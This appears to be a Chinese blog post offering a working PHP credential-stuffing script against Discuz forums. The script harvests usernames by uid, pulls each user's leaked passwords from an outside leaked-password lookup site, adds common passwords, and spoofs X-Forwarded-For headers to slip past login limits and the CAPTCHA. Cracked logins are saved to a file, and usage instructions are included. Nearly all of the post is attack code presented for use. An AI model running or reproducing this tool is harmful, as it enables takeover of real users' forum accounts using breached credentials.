Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本
- 发表于
- 周边
+++++++++++++++++++++++++++++++++++++++++++++++++++
开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
示例: php.exe $argv[0] http://site.me/ 1 255
结果保存在ok.txt里
+++++++++++++++++++++++++++++++++++++++++++++++++++
以下代码保存为exp.php
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 |
<?php class fuckdz{ public function sgk($user){ $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto="); $a=iconv("UTF-8", "GB2312//IGNORE", $a); preg_match_all("/7%\">(.*)</isU",$a,$arr); unset($arr[0]); foreach ($arr as $key=>$r){ return $r; } } public function getuid($host,$uid){ $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244); $opts = array ( 'http' => array ( 'method' => 'GET', 'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx", 'timeout'=>15, ) ); $context = stream_context_create($opts); $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context); if(strpos($a,'charset=utf-8')){ $a=iconv("UTF-8", "GB2312//IGNORE", $a); } if(preg_match("/<title>(.*)的个人/isU",$a,$arr)){ $a=str_replace("\r","",trim($arr[1])); $a=trim(str_replace("\n","",$a)); return $a; }else{ return false; } } public function is_pass($host,$user,$pass){ $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244); $opts = array ( 'http' => array ( 'method' => 'GET', 'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx", 'timeout'=>15, ) ); $context = stream_context_create($opts); $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context); if(strpos($a,"window.location.href")){ return true; }else{ return false; } } public function crack($host,$a,$b){ $host=str_replace("http://","",$host); $host="http://".$host."/"; for($vip=$a;$vip<=$b;$vip++){ if(!($user=$this->getuid($host,$vip))){ continue; } $pass=$this->sgk($user); array_push($pass,"123456"); array_push($pass,"654321"); array_push($pass,"123123"); array_push($pass,"woaini"); array_push($pass,"caonima"); array_push($pass,"12345"); array_push($pass,"12345789"); array_push($pass,"5201314"); array_push($pass,"1314520"); array_push($pass,$user); array_push($pass,$user."123456"); array_push($pass,"abc123"); array_push($pass,$user.".."); for($i=0;isset($pass[$i]);$i++){ echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i].""; if($this->is_pass($host,$user,$pass[$i])){ echo "爆破成功!\r\n--------------------"; file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND); break; }else{ echo "爆破失败"; } } } } } $f=new fuckdz(); //error_reporting(0); set_time_limit(0); if(empty($argv[1])){ print_r(" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 示例: php.exe $argv[0] http://phpinfo.me/ 1 255 结果保存在ok.txt里 Blog:http://phpinfo.me +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n "); }else{ if(!empty($argv[1])){ $f->crack($argv[1],$argv[2],$argv[3]); }else{ echo "逗比"; } } ?> |
原文连接:Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
